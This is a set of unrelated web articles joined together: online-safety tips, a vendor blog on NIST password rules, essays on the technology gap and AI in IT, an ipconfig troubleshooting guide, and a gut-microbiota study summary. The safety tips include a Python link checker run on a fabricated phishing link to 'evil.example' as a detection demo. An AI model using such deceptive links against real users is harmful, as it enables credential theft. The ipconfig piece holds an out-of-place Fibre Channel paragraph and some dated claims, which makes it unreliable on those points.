Search became the answer to all our woes years ago. Can't remember where you stored a file? Forgot the file's name or when it was created? Can't figure out where a setting went? Not to worry: search to the rescue! The problem with using search this way is that it lets us pay less attention to what we are doing. We rely on search, or anticipate using it later, which makes us lazier because we are confident it will provide what we need.
Where this can hurt us is relying upon search to find company websites. It would be challenging to find someone who has never experienced clicking on a website result only to find it was not what we were looking for. This is not a big deal when searching for a specific item not tied to a company. However, for banking and other websites that would need to collect personal information, this is much riskier. If you imagine the drive home from work and how easy it can be to forget part of the trip, this is what can happen when we use search all the time - we forget to stop and consider what we are clicking.
The fix: Bookmark the correct site instead of searching and absently clicking on results.
Don't click or call the number in popup warnings
Popup warnings are different from ads and website interactions like subscribing to a newsletter or signing up for a coupon. By contrast, these are the warnings claiming your computer has been infected and you need to call (enter the company here) so they can fix your computer. Oftentimes they pretend to be Microsoft or other reputable companies to encourage people to call. Unfortunately, these popups use shady scare tactics to convince people to let them connect remotely when you otherwise would not.
What is important to know is that a popup claiming you have been infected does not mean you have been infected. In other words, a popup can claim anything; that does not make it true. People who call are encouraged to allow the company to connect remotely so it can "clean their computer". At this point, typically one of two things happens: the user either overpays for software to remove malware that likely never existed in the first place, or, in the worst case, real malware is installed.
The fix: Close the web browser. If the popup returns, reset the browser to factory settings or, if necessary, uninstall and reinstall the browser.
Most importantly, do not ever let someone remotely connect to your computer unless you know who they are and trust them. Remote control software was created for a great purpose - to allow technicians to help people without physically being in the same location. It can also be used to run updates and install software when users are not actively on their computers, as is the most common case with businesses. Unfortunately, those settings that make it great for remote tech support also make it dangerous when misused.
Look for more than the lock symbol next to a website
This is important because we have all been taught to look for the lock symbol next to a website's address to be confident the site is encrypting our data before transferring it. Unfortunately, the lock symbol alone is not enough. It only means the site has obtained a valid security (TLS) certificate for its domain; it does not mean the site is trustworthy or that it is safe to enter your information.
As an example, Wells Fargo's website is wellsfargo.com. If you were unknowingly redirected to wellsfargo.online.com and someone made this fake site look just like Wells Fargo's website, you might be tricked into entering your credentials. In situations like this, the lock symbol does not protect you because you are submitting your information directly to the hackers. While the lock does show the site is secure, if you are using the wrong site, your information is still at risk.
The fix: Always check the URL before entering your credentials. This is especially important when using search or clicking on links in email, which I recommend doing cautiously. It is easy to be redirected without realizing it. Checking the URL in its entirety provides the greatest likelihood that you will never fall for this trick.
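To make the Wells Fargo example concrete, here is a minimal sketch (Python; the allow-list is hypothetical) of checking a URL's true hostname against domains you trust, rather than relying on how the link looks:

```python
from urllib.parse import urlparse

# Hypothetical allow-list of sites you have bookmarked and trust
TRUSTED_DOMAINS = {"wellsfargo.com"}

def is_trusted(url: str) -> bool:
    """Accept only the exact trusted domain or a true subdomain of it."""
    host = urlparse(url).hostname or ""
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)

print(is_trusted("https://www.wellsfargo.com/login"))     # the real site
print(is_trusted("https://wellsfargo.online.com/login"))  # the look-alike
```

The look-alike fails because its registered domain is actually online.com, not wellsfargo.com, no matter how convincing the page itself looks.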
Go directly to a site rather than clicking on a link in an email
Last but not least, clicking on links in emails can be very risky. There are examples of emails with safe links including, but not limited to:
- Newsletters you have subscribed to and trust
- Emails received after clicking a link on a website to reset a password or recover an account
- Deals or product information emails from companies you trust and that you actively signed up to receive
Aside from emails you are expecting or have consented to receive, use caution clicking on links. This is especially true of threatening emails or emails using scare tactics like you need to change your password because there was a data breach, etc. Keep in mind, a link's text can be anything and the destination link might not match the text.
A hyperlink contains two parts: the text describing the link and the actual link destination. The text may look like this: "Check out our sale now!" and appear to have come from a company you subscribe to, but the hyperlink could be pointing to a nefarious website hoping to gather your personal data.
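The two parts of a hyperlink can even be pulled apart programmatically. This sketch (Python standard library; the HTML snippet is fabricated for illustration) extracts each link's visible text alongside its real destination so the two can be compared:

```python
from html.parser import HTMLParser

class LinkAuditor(HTMLParser):
    """Collect (visible text, href) pairs so the two can be compared."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None

auditor = LinkAuditor()
# Friendly-looking text pointing at a hostile destination
auditor.feed('<a href="http://evil.example/login">Check out our sale now!</a>')
print(auditor.links)
```

Here the text promises a sale while the href points somewhere else entirely, which is exactly what hovering over a link reveals in your mail client.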
The fix: Hover over the link to see where the link is really going. Instead of using the link, go to the site directly or call the company to see if there really is a problem with your account. The more we notify companies of scams like this, the better they can inform other customers and the safer we will all be.
During National Consumer Protection Week, and every week, it is important to do your best to protect yourself. Going directly to websites rather than using search, checking that you are at the correct website before entering your credentials, refusing to click on ads that use scare tactics, and using caution with links in emails are all ways you can protect yourself from common attack schemes happening all the time.
As always, knowing what form an attack may take will better help you identify the risks so you can avoid them rather than becoming a victim! | <urn:uuid:6625b939-9f14-42f0-a506-f2514a4ac310> | CC-MAIN-2024-38 | https://blogs.eyonic.com/its-consumer-protection-week-heres-4-ways-to-be-safer-online/ | 2024-09-20T06:30:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00287.warc.gz | en | 0.956594 | 1,536 | 2.671875 | 3 |
Passwords are the most widely used form of authentication across the globe and serve as the first line of defense to critical systems, applications, and data. In the past decade, however, they have attracted the ire of IT security experts for their ineffectiveness to stop hackers.
According to the 2018 Credential Spill Report, 2.3 billion credentials were stolen in 2017. To safeguard passwords from attacks, the National Institute of Standards and Technology (NIST) publishes guidelines that cover the security requirements of passwords in detail. Though intended for federal agencies, these guidelines can help all types of organizations implement strong password policies without affecting the end-user experience.
The recently published NIST Special Publication 800-63B report defines the standards for authentication and identity life cycle management. Section 5.1.1 of this report covers the guidelines related to password security and talks about what can be done to ensure optimal security.
NIST password guidelines: The dos and don’ts
What you should do:
- Support long passwords (up to at least 64 characters) and require a minimum length of 8 characters.
- Permit the use of printable ASCII characters, Unicode characters, and spaces.
- Blacklist commonly used words, dictionary words, and breached passwords, such as password1, qwerty123, etc.
- Restrict the use of repetitive or sequential characters, such as aaaa1234, 123456, etc.
- Offer guidance, such as a password strength meter, to help users choose a strong password.
- Enforce account lockouts after a certain number of failed authentication attempts.
- Permit the use of the paste functionality when entering passwords.
- Enforce two-factor authentication (2FA), which adds an additional layer of authentication on top of passwords.
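The 2FA recommendation above is commonly implemented with time-based one-time passwords (TOTP, standardized in RFC 6238, built on the HOTP algorithm of RFC 4226). A minimal sketch using only the Python standard library:

```python
import hashlib
import hmac
import struct
import time

def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over a big-endian counter, then truncate."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(key: bytes, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP where the counter is the current 30-second window."""
    return hotp(key, int(time.time()) // step, digits)
```

An authenticator app and the server share the same secret key; both compute the same 6-digit code for each 30-second window, so a stolen password alone is not enough to log in.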
What you should not do:
- Enable password complexity requirements, i.e., requiring a password to contain a certain number of uppercase characters, lowercase characters, special characters, and digits.
- Enable password expiration.
- Use security questions that involve personal information about the user.
- Use hints to help users remember their passwords.
Some of these guidelines are vastly different from what have been traditionally considered password security best practices. For example, the NIST recommends that password complexity requirements, which have been regarded as one of the most important settings to ensure stronger passwords, be disabled.
According to NIST, when complexity rules are enforced, users respond in a predictable manner and choose common passwords, such as password1!, or write them down somewhere. Password expiration, another setting long considered a security best practice, is also advised against in these guidelines. Microsoft, too, has announced that the password expiration settings in Windows will be phased out in the near future.
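Several of these guidelines can be enforced directly in code. The sketch below (Python; the blacklist is a tiny stand-in for a real breached-password list) checks length, blacklisted passwords, and repetitive or sequential characters, while deliberately imposing no complexity or expiration rules:

```python
# Tiny stand-in for a real blacklist of breached and dictionary passwords
BLACKLIST = {"password1", "qwerty123", "letmein"}

def nist_problems(pw: str) -> list:
    """Return the NIST-style rules a candidate password violates."""
    problems = []
    if len(pw) < 8:
        problems.append("shorter than 8 characters")
    if pw.lower() in BLACKLIST:
        problems.append("found in the breached-password blacklist")
    # Repeated runs like 'aaaa'
    if any(pw[i] == pw[i + 1] == pw[i + 2] for i in range(len(pw) - 2)):
        problems.append("repetitive characters (e.g. aaaa)")
    # Ascending runs like '1234' or 'abcd'
    if any(ord(pw[i + 1]) - ord(pw[i]) == 1 == ord(pw[i + 2]) - ord(pw[i + 1])
           for i in range(len(pw) - 2)):
        problems.append("sequential characters (e.g. 1234)")
    return problems
```

A long passphrase such as `correct horse battery staple` passes every check, while `aaaa1234` is rejected for both repetition and sequence.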
Enforcing NIST guidelines in Active Directory (AD)
For most organizations, AD serves as the identity store where users are authenticated before they’re allowed to access network resources. Unfortunately, implementing NIST guidelines using the domain password policy settings in AD is not possible, as it lacks many of the capabilities recommended by the NIST. For example, there’s no way to blacklist dictionary words or display a password strength meter to help users choose a strong password.
How ADSelfService Plus can help with NIST compliance
ManageEngine ADSelfService Plus is an integrated Active Directory self-service password management and single sign-on solution. The Password Policy Enforcer feature in ADSelfService Plus supports advanced password policy settings including dictionary rule, pattern checker, an option to enforce the use of Unicode characters, an option to restrict the use of repetitive characters, and more.
You can configure a file containing a list of all the leaked passwords in ADSelfService Plus, and prevent users from using those passwords. The solution also displays a password strength meter when users change or reset their domain password using its self-service portal.
Fig 1. Password policy settings available in ADSelfService Plus
Additionally, you can create multiple password policies with different levels of complexities, and apply them granularly based on the OUs and groups in AD. This way, you can ensure that users with higher privileges use strong passwords, while other users have a relatively lenient password complexity to abide by. ADSelfService Plus also supports 2FA for Windows (both local and remote desktop logons) and cloud applications through single sign-on.
The cyberthreat landscape is continuously evolving, so even NIST guidelines can’t be considered the be-all and end-all solution. Although these guidelines provide a basic starting point, you should consider the security requirements of your business, IT compliance laws (for example, PCI DSS has its own set of password guidelines), and other factors before devising your password policies.
Most importantly, it’s time to jump on the 2FA bandwagon and enable it for all systems and applications in your organization. Whatever your requirements are, a tool like ADSelfService Plus can help you make the transition towards better security. Get started right away by downloading a free, 30-day trial of ADSelfService Plus. | <urn:uuid:4af131eb-8a7c-4763-a2e8-d9ad5b9a0bee> | CC-MAIN-2024-38 | https://blogs.manageengine.com/active-directory/adselfservice-plus/2019/07/16/complying-with-nist-password-guidelines.html | 2024-09-09T08:26:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00387.warc.gz | en | 0.905442 | 1,038 | 3.5 | 4 |
In the age of rapid technological advancement, the term “technology gap” has gained prominence as a concept highlighting disparities in access, utilization, and proficiency with technology. This article aims to elucidate the multifaceted nature of the Define Technology Gap and its far-reaching implications in today’s interconnected world.
Defining the Technology Gap
The technology gap, often referred to as the digital divide, is a multifaceted concept encompassing disparities related to technology access, digital skills, and the ability to harness the benefits of technological advancements. It represents a chasm between those who have ready access to technology and the digital world and those who do not, creating a gulf that can perpetuate socio-economic inequalities.
At its core, the technology gap comprises:
1. Access Disparities: The most fundamental aspect of the technology gap is unequal access to technology and the internet. This includes disparities in physical access to devices like computers and smartphones as well as variations in the availability of high-speed internet connections.
2. Digital Literacy: Technology proficiency is another dimension of the gap, reflecting differences in digital literacy and the ability to navigate digital platforms, use software, and engage in online communication effectively.
3. Socioeconomic Factors: Socioeconomic status often plays a pivotal role in the technology gap. Individuals with limited financial resources may struggle to acquire the necessary devices or access the internet, further exacerbating the divide.
4. Educational Disparities: The technology gap is often intertwined with educational disparities. Students with limited access to technology may face obstacles in remote learning, research, and digital skill development.
5. Rural-Urban Disparities: Geographic location can also contribute to the technology gap, as rural areas may have less access to high-speed internet infrastructure and technology resources compared to urban centers.
Implications of the Technology Gap
The consequences of the technology gap are far-reaching and touch various aspects of modern life:
1. Economic Disparities: Those on the wrong side of the technology gap may face limited employment opportunities, reduced earning potential, and barriers to participating in the digital economy.
2. Educational Inequities: The technology gap can hinder educational outcomes, as students lacking access to technology and the internet may struggle to keep up with online learning platforms and digital research tools.
3. Social Isolation: Individuals with limited digital access may experience social isolation, especially in an era where social interactions often occur online.
4. Healthcare Disparities: Access to telehealth services and digital health resources can be compromised for those on the wrong side of the technology gap, impacting their healthcare options.
5. Civic Participation: Engagement in civic life, including access to government services and participation in democratic processes, can be limited for those without digital access.
Bridging the Gap
Efforts to bridge the technology gap are crucial for fostering a more inclusive and equitable society. Solutions may include:
1. Infrastructure Investment: Expanding broadband internet access to underserved areas can reduce disparities in connectivity.
2. Digital Literacy Programs: Initiatives that offer digital skills training can empower individuals to navigate the digital landscape effectively.
3. Device Accessibility: Subsidized or low-cost devices can increase access to technology for those with limited financial means.
4. Education Reforms: Schools can play a role in addressing the technology gap by ensuring that all students have access to necessary technology resources for learning.
A Call for Inclusivity
The Define Technology Gap is not merely a digital divide; it is a reflection of societal disparities in access, skills, and opportunities. To build a more inclusive and equitable future, concerted efforts are required to bridge this gap, ensuring that everyone has the chance to benefit from the vast opportunities and knowledge the digital age has to offer. It is only through collective action that we can pave the way to a more technologically inclusive world. | <urn:uuid:91561bfd-f240-4e6e-8282-51bdcb3bb33a> | CC-MAIN-2024-38 | https://generaltonytoy.com/define-technology-gap-bridging-the-chasm-understanding/ | 2024-09-13T02:12:45Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00087.warc.gz | en | 0.924706 | 794 | 4.15625 | 4 |
Artificial Intelligence (AI) has, for the time being, become one of the terms most used by businesses to highlight the technological prowess of their products and solutions. The world is steadily moving toward automation: from autonomous robots to computer systems that can almost instantly sift through thousands of papers, saving companies time and money in new ways. Such systems can now handle tasks that are important but repetitive and time-consuming, which would take people much longer and be more vulnerable to error.
AI focuses on creating intelligent systems that are capable of learning, reasoning, adapting, and performing tasks in ways similar to humans. To obtain the best results, information technology systems capture, store, analyze, and evaluate data. AI systems go further, developing knowledge and facts from that data, which makes them more intelligent than conventional information systems.
Artificial intelligence reshaping IT
The following measures show how AI is proving useful in reshaping IT and ultimately helping IT leaders build a stronger foundation:
1. “IT” – major AI consumer
Wayne Butterfield, Director of Cognitive Automation and Innovation at Intelligent Services Gateway (ISG), is of the view, “An IT Service Desk is as prone to repetition (and therefore automation) as a customer service operation.” The methods used to automate conventional break-fix processes and other IT service desk processes are not new, but these days they are gaining considerable traction.
2. Shadow IT could expand
As a result of AI, IT activities taking place outside the tech core are rapidly increasing. According to ISG's Butterfield, the influence of perceived shadow IT functions is expanding in enterprises, whether that involves data science and analytics tools, robotic process automation (RPA) running across an enterprise, or machine learning models. Of course, much depends on the culture and on how an organization draws the line between "self-service" and "shadow IT."
3. Data science to deeply connect with IT
Some traditional business applications, such as customer relationship management (CRM), are making greater use of AI and automation. To work with advanced forms of AI, a strong bond between IT and data science is becoming essential. Shawn Rogers, Vice President, Corporate Market at TIBCO, commented, “The early days of having a data scientist tucked away in the organization are over. Today, data science takes a village, and IT is part of that team.”
Every organization preparing to scale its use of AI and analytics needs deeper access to the data and system applications that IT manages. George Mathew, client partner for technology services at Fractal Analytics, says, “Building AI-led solutions requires intense collaboration between the data scientists and engineers.” He continues, “While each of these is a deep area by itself, successful teams have enabled these two groups to work together, and in many cases overlap across areas, in order to production AI solutions.”
4. IT and data science to share tools and tactics
IT and data science teams need to adopt some of each other's technologies and techniques, “at least for the sake of familiarity, if not for expertise,” as George Mathew says.
How AI impacts IT
IT and AI are both growing at breakneck speed. AI technologies are revitalizing old ideas and helping IT systems perform optimized operations. For IT functionality to grow, AI acts as a stepping stone that the industry needs to transform its systems into intelligent ones. Automation and optimization are the key contributions of AI to IT. The following list reflects applications of AI in information technology:
1. Data security
Securing systems is essential in information technology because they store the confidential information of private and public organizations as well as governments. Designing and maintaining a stable infrastructure is a high priority for any information network. An AI system can meet these challenges by identifying threats and data breaches and by providing precautions and solutions to security-related issues at the earliest opportunity.
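As a toy illustration of the underlying idea only (real AI security products use far richer models than this), even simple statistics can flag anomalous activity, such as a sudden spike in failed logins; the data and threshold below are invented for the example:

```python
from statistics import mean, stdev

def flag_anomalies(samples, threshold=2.5):
    """Flag values more than `threshold` sample standard deviations above the mean."""
    mu = mean(samples)
    sigma = stdev(samples)
    return [x for x in samples if sigma > 0 and (x - mu) / sigma > threshold]

# Hypothetical failed-login counts per hour; the last hour looks like an attack
failed_logins = [3, 2, 4, 3, 2, 3, 4, 2, 3, 2, 3, 4, 2, 3, 2, 3, 4, 2, 3, 500]
print(flag_anomalies(failed_logins))
```

A deployed system would learn what "normal" looks like over time and adapt its thresholds, but the principle of flagging outliers for investigation is the same.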
2. Building better information systems
The foundation for developing any program is valid, bug-free code. AI systems are built to improve overall productivity: an AI framework uses a set of algorithms that can help programmers write better code or fix bugs in existing code.
3. Process automation
An AI system integrated with deep learning networks aims to automate backend processes to reduce time and cost. An AI-driven algorithm gradually learns from its errors when executing tasks and automatically optimizes the code to work better.
The digital transformation and the industry's rapid adoption of technology have given rise to new advances that optimize and solve the industry's core challenges. Among all technology applications, AI is at the heart of every industry's deployments, and information technology is at the forefront of the list. Integrating AI into IT has reduced the burden on developers and improved efficiency, quality assurance, and productivity. On a larger scale, the advanced algorithmic capabilities of AI are making possible IT systems whose development and deployment were previously impossible. Find more such content and information in our latest whitepapers on AI.
When it comes to troubleshooting network problems, many people are intimidated by the complexity of TCP/IP. Although TCP/IP is much more complex than other protocols, it tends to be easier to troubleshoot because it contains several tools designed to help you locate and solve a wide variety of problems. (Many network administrators wish that protocols such as IPX/SPX and NetBEUI had TCP/IP's troubleshooting tools.) One such tool is the ipconfig program.
To use ipconfig, simply open a Command Prompt window and enter “ipconfig”. When you do, Windows NT will display a summary of each network adapter installed in your system, along with its TCP/IP configuration.
The ipconfig command is especially useful for diagnosing DHCP problems. If you’re using a DHCP server, you can use ipconfig to see the address that DHCP has assigned to the adapter. If you’re using a DHCP server, but you see the IP address 0.0.0.0, your computer has either lost communication with the DHCP server or the DHCP server is malfunctioning.
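The 0.0.0.0 check can even be scripted. This sketch (Python; the sample text is fabricated to resemble ipconfig output) scans ipconfig-style output and flags adapters that never obtained a DHCP lease:

```python
import re

def dhcp_lease_failed(ipconfig_output: str) -> bool:
    """True if any adapter reports the address 0.0.0.0 (no DHCP lease obtained)."""
    addresses = re.findall(r"IP(?:v4)? Address[ .]*:\s*([\d.]+)", ipconfig_output)
    return any(addr == "0.0.0.0" for addr in addresses)

# Fabricated sample resembling ipconfig output on a failing adapter
sample = """Ethernet adapter Local Area Connection:
    IP Address. . . . . . . . . . . . : 0.0.0.0
    Subnet Mask . . . . . . . . . . . : 0.0.0.0
"""
print(dhcp_lease_failed(sample))
```

A script like this could run the real `ipconfig` via a subprocess on each machine and alert an administrator whenever a lease failure appears.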
If you're using static IP addresses, you can use ipconfig to see the TCP/IP configuration as Windows sees it. The information displayed isn't simply a regurgitation of what's entered in the TCP/IP properties sheet; rather, it's a way to tell whether Windows has accepted the address that you've used.
By default, ipconfig lists the IP address, subnet mask, and default gateway of each network adapter. If you require more detailed information, you can use the /all switch after the ipconfig command. Doing so will cause the ipconfig program to display more detailed information, such as the MAC address of each network card, and an indication of whether the address was provided by a DHCP server.
Fibre Channel, an emerging technology, evolved from SCSI into an optical, highly specialized packet-based transport. Fibre Channel does two things: it runs the SCSI protocol at 100MB per second per port over optical cables, and it runs a unique storage protocol at 1.06Gbps in packets. (Fibre Channel does not currently run IP.) It's really SCSI using a different transport. As a network topology, Fibre Channel uses a hub or a switch as a concentrator; the switch runs faster than the hub. Fibre Channel supports runs of up to 500 meters, which is suitable for most applications. (You can spend more money and purchase special cables and drivers to go up to 10 kilometers.)
Current Fibre Channel Arbitrated Loop (FC-AL) has one downside: it runs Class 3 service. Three service classes govern transmission quality of service, and Class 3 neither guarantees nor acknowledges transmission. If the fibre drops a packet and the software fails to catch it, the result is a hang (or a timeout), causing the system to momentarily freeze. The loop reinitialization process then begins, resetting the entire bus.
Use winipcfg in Windows 98
Unfortunately, the ipconfig command only works in Windows NT. If you have computers on your network running Windows 98, you’ll have to use a different command. To do so, enter “winipcfg” at the Run prompt. Doing so will display a dialog box that displays the computer’s TCP/IP configuration, as seen by Windows. Click the More Info button to get additional information, such as the WINS and DNS configuration.
You can select the network adapter on which you're viewing information by choosing the adapter from a drop-down list. If you need to release or renew a lease, you can do so by selecting the adapter from the drop-down list and clicking the Release or Renew button. Likewise, you can release or renew the lease for all installed adapters by clicking Release All or Renew All.
Brien M. Posey is an MCSE who works as a freelance writer and as the director of information systems for a national chain of health care facilities. His past experience includes working as a network engineer for the Department of Defense. Because of the extremely high volume of e-mail that Brien receives, it’s impossible for him to respond to every message, although he does read them all. | <urn:uuid:453c4a63-a4b5-4121-a865-c2b76b667849> | CC-MAIN-2024-38 | https://www.enterprisenetworkingplanet.com/management/diagnose-dhcp-problems-with-ipconfig/ | 2024-09-13T02:15:02Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00087.warc.gz | en | 0.905878 | 932 | 2.875 | 3 |
Understanding regulatory compliance: Types, challenges and best practices
Regulatory compliance is a cornerstone of good governance and risk management, yet navigating the complex landscape of regulations can be a daunting task for compliance professionals, board members and executive leaders alike.
Here, we'll explore the basics of regulatory compliance, addressing common questions and offering insights into effective practices.
What is regulatory compliance?
Regulatory compliance refers to an organization's adherence to the laws, regulations and standards established by government agencies, industry bodies or other external entities. These regulations can encompass various aspects of an organization's operations, including:
- Financial reporting and auditing
- Data privacy and security
- Product safety and quality
- Environmental protection
- Anti-bribery and corruption
- Labor laws and employment practices
The specific regulations applicable to an organization depend on its industry, size, location, and activities. Understanding and complying with these regulations is crucial for several reasons:
- Avoiding legal and financial penalties: Non-compliance can lead to significant fines, reputational damage and even criminal charges.
- Protecting stakeholders: Compliance safeguards the interests of customers, employees, investors and the broader community.
- Building trust and reputation: A commitment to compliance fosters trust and enhances an organization's reputation as a responsible and ethical entity.
- Gaining a competitive edge: By proactively complying with regulations, organizations can avoid disruptions and establish themselves as reliable and trustworthy partners.
What are the common challenges in achieving regulatory compliance?
Maintaining compliance can be challenging due to several factors:
- Complexity and dynamism: The regulatory landscape is constantly evolving, as new regulations are introduced and existing ones are amended. Keeping up with these changes requires continuous monitoring and adaptation.
- Resource limitations: Implementing and maintaining a robust compliance program can be resource-intensive, especially for smaller organizations.
- Lack of awareness and understanding: Employees may not be fully aware of their compliance obligations, leading to inadvertent breaches.
- Siloed information and processes: A lack of centralized visibility over compliance activities can hinder effective management and oversight.
How can organizations build an effective compliance program?
To overcome these challenges and achieve sustained compliance, organizations can adopt the following strategies:
- Establish a clear compliance culture: Foster a culture built on ethics and integrity, where compliance is viewed as a shared responsibility, not just a compliance department concern.
- Conduct comprehensive risk assessments: Regularly identify, assess and prioritize compliance risks specific to your organization.
- Develop and implement a compliance program: Create a documented program outlining policies, procedures, and controls to address identified compliance risks.
- Invest in training and awareness: Train employees at all levels on their compliance obligations and equip them with the knowledge and skills necessary to comply with relevant regulations.
- Maintain clear communication: Communicate compliance expectations and responsibilities clearly to all employees through various channels.
- Implement monitoring and reporting mechanisms: Establish ongoing monitoring processes to identify and address potential compliance gaps and report relevant information to management and the board.
- Leverage technology: Utilize technology to streamline compliance processes, automate tasks, and improve data management and reporting capabilities.
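The risk-assessment and prioritization steps above are often operationalized as a simple likelihood × impact score. The sketch below uses a hypothetical 1–5 scale and invented risk entries purely for illustration.

```python
# Hypothetical likelihood x impact scoring (1-5 scale each) used to
# rank compliance risks for remediation; the entries are illustrative.

risks = [
    {"name": "Data privacy gap",      "likelihood": 4, "impact": 5},
    {"name": "Outdated AML training", "likelihood": 3, "impact": 3},
    {"name": "Vendor due diligence",  "likelihood": 2, "impact": 4},
]

def prioritize(risks):
    """Sort risks by likelihood * impact, highest score first."""
    return sorted(risks, key=lambda r: r["likelihood"] * r["impact"], reverse=True)

ranked = prioritize(risks)
```

In practice the scales, categories, and weightings would come from your own risk framework; the point is simply that a documented scoring rule makes prioritization repeatable and auditable.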
What is the role of the board of directors in ensuring regulatory compliance?
The board of directors plays a critical role in overseeing the organization's compliance efforts. This includes:
- Approving the compliance program: Setting the overall tone and direction for the compliance program and providing necessary resources.
- Overseeing management's implementation: Holding management accountable for implementing and maintaining an effective compliance program.
- Providing guidance and support: Providing guidance and support to management on compliance matters and ensuring appropriate communication with the board.
- Receiving regular reports: Receiving regular reports on the organization's compliance performance and any identified risks or issues.
How can compliance and governance professionals stay updated on regulatory changes?
Staying informed about regulatory changes is essential for board members and executive leaders. Here are some ways to achieve this:
- Subscribe to industry publications and regulatory body updates: Stay up-to-date on industry trends and regulatory changes by subscribing to relevant publications and newsletters from regulatory agencies.
- Attend industry conferences and workshops: Participate in industry conferences and workshops to learn about new compliance challenges and best practices.
- Utilize professional networks and resources: Leverage professional networks and industry associations to share information and resources with other compliance professionals.
- Seek external expertise: When faced with complex regulations or legal issues, consider engaging experienced external consultants or legal counsel.
By adopting a proactive and comprehensive approach to regulatory compliance, organizations can navigate the ever-evolving regulatory landscape effectively.
This not only mitigates risks and protects the organization from potential liabilities but also fosters trust, enhances reputation and promotes sustainable business growth. | <urn:uuid:d558f822-d1e3-4fb4-9b93-0f11ceb6a69e> | CC-MAIN-2024-38 | https://www.diligent.com/resources/blog/understanding-regulatory-compliance | 2024-09-15T09:15:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00787.warc.gz | en | 0.923695 | 971 | 2.671875 | 3 |
Bacteria, often synonymous with infection and disease, may have an unfair reputation.
Research indicates there are as many, if not more, bacterial cells in our bodies as human cells, meaning they play an important role in our physiology.
In fact, a growing body of evidence shows that greater gut microbiota diversity (the number of different species and evenness of these species’ populations) is related to better health.
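Diversity in this sense combines richness (the number of species) and evenness (how balanced their populations are); the Shannon index is one standard way to quantify both at once. The species counts below are made up for illustration.

```python
import math

def shannon_index(counts):
    """Shannon diversity H = -sum(p_i * ln p_i) over species proportions."""
    total = sum(counts)
    return -sum((c / total) * math.log(c / total) for c in counts if c > 0)

# A perfectly even community is more diverse than a skewed one
# with the same number of species (same richness, higher evenness).
even   = shannon_index([25, 25, 25, 25])   # ln(4) ≈ 1.386
skewed = shannon_index([85, 5, 5, 5])
```

Both communities have four species, but the even one scores higher, which is exactly the richness-plus-evenness notion of diversity used in microbiome studies.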
Now, research published in Experimental Physiology has suggested that the efficiency with which we transport oxygen to our tissues (cardiorespiratory fitness) is a far greater predictor of gut microbiota diversity than either body fat percentage or general physical activity.
The findings suggest that exercise intense enough to improve cardiorespiratory fitness may support health through favourable alterations in the presence, activity and clustering of gut microbes.
Such exercise-induced improvements in cardiorespiratory fitness often correspond with central adaptations (e.g. an increased volume of blood pumped by the heart each beat) and peripheral adaptations (e.g. an increased number of capillaries to transport oxygen from blood to muscles).
Before now, it was understood that higher cardiorespiratory fitness tended to coincide with greater gut microbiota diversity, but it was unclear whether this relationship was attributable to body fat percentage or physical activities of daily-living.
Since cancer treatment is known to trigger physiological changes detrimental to cardio-metabolic health, including increased body fat percentage and declining cardiorespiratory fitness, this research was performed on cancer survivors.
In total, 37 non-metastatic breast cancer survivors, who had completed treatment at least one year prior, were enrolled.
Participants performed a graded exercise test to estimate peak cardiorespiratory fitness, assessments of total energy expenditure and examination of gut microbiota from faecal swipes.
The results showed that participants with the higher cardiorespiratory fitness had significantly greater gut microbiota diversity compared to less fit participants.
Further statistical analyses highlighted that cardiorespiratory fitness accounted for roughly a quarter of the variance in species richness and evenness, independent of body fat percent.
These data offer intriguing insight into the relationship between cardiorespiratory fitness and gut microbiota diversity.
However, given the cross-sectional nature of the study design, the research team’s findings are correlative in nature.
The participant sample was restricted to women with a history of breast cancer, who tended to exhibit low cardiorespiratory fitness and other health problems, meaning generalisation to other groups should be made with caution.
Stephen Carter, lead author of the paper from Indiana University, is enthusiastic about continuing his team’s research:
“Our group is actively pursuing an interventional study to determine how variation in exercise intensity can influence gut microbiota diversity under controlled-feeding conditions to uncover how exercise may affect functional outcomes of gut microbiota, as well as, studying how exercise prescription may be optimized to enhance health outcomes among clinical populations.”
More information: Stephen J. Carter et al, Gut microbiota diversity associates with cardiorespiratory fitness in post-primary treatment breast cancer survivors, Experimental Physiology (2019). DOI: 10.1113/EP087404
Ron Sender et al. Are We Really Vastly Outnumbered? Revisiting the Ratio of Bacterial to Host Cells in Humans, Cell (2016). DOI: 10.1016/j.cell.2016.01.013
Provided by The Physiological Society | <urn:uuid:2b9111a6-e01e-44ed-b8a9-07ac0a993373> | CC-MAIN-2024-38 | https://debuglies.com/2019/02/15/exercise-improve-health-by-increasing-gut-bacterial-diversity/ | 2024-09-16T15:45:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00687.warc.gz | en | 0.935179 | 717 | 3.15625 | 3 |
Artificial intelligence was once a phenomenon restricted to sci-fi movies, but technology has finally caught up with imagination. Now AI has become reality and amazingly, most people encounter some form of artificial intelligence in their everyday lives.
For example, AI has dramatically improved the technology in our homes. Amazon’s Alexa can carry out a number of functions via voice interactions, such as playing music, answering factual questions and even making online purchases. And now, with the recent launch of AmazonGo, AI allows shoppers to simply walk out of a shop with their purchases and automatically get charged, sending an invoice directly to their phone.
To truly understand AI, we must first absorb its definition. According to Gartner there are three key requirements that define AI:
